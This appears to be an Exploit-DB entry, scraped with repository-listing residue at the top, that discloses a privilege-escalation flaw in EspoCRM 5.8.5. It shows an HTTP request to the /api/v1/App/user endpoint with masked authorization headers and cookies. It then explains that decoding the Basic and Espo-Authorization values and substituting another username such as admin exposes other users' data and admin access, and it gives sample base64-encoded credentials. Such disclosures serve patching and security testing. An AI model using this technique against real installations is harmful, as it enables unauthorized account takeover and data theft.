
5 changes to exploits/shellcodes Popcorn Time 6.2 - 'Update service' Unquoted Service Path EspoCRM 5.8.5 - Privilege Escalation Edimax EW-7438RPn 1.13 - Remote Code Execution Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)
40 lines
No EOL
1.3 KiB
Text
40 lines
No EOL
1.3 KiB
Text
# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation
|
|
# Author: Besim ALTINOK
|
|
# Vendor Homepage: https://www.espocrm.com
|
|
# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip
|
|
# Version: v5.8.5
|
|
# Tested on: Xampp
|
|
# Credit: İsmail BOZKURT
|
|
|
|
-------------
|
|
|
|
Details:
|
|
--------------------------------------------
|
|
|
|
1- When we sent a request to the /api/v1/App/user, we can see user details
|
|
---
|
|
First Request:
|
|
---------------------------
|
|
GET /api/v1/App/user HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 *************************
|
|
Authorization: Basic *************************************
|
|
Espo-Authorization: *************************************
|
|
Espo-Authorization-By-Token: true
|
|
X-Requested-With: XMLHttpRequest
|
|
DNT: 1
|
|
Connection: close
|
|
Cookie: auth-token-secret=cdc7f7*********************377;
|
|
auth-username=user1; auth-token=3a874a********************************48
|
|
----
|
|
|
|
2- When we decode Basic Authorization and Espo-Authorization and change the
|
|
value with another username (like admin) in the first request, we can see
|
|
other user information and access like BOSS
|
|
----------
|
|
|
|
3- Some Examples and encode technique
|
|
|
|
- BASE64:
|
|
First type: dXNlcjE6MQ== (user1:1)
|
|
Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass) |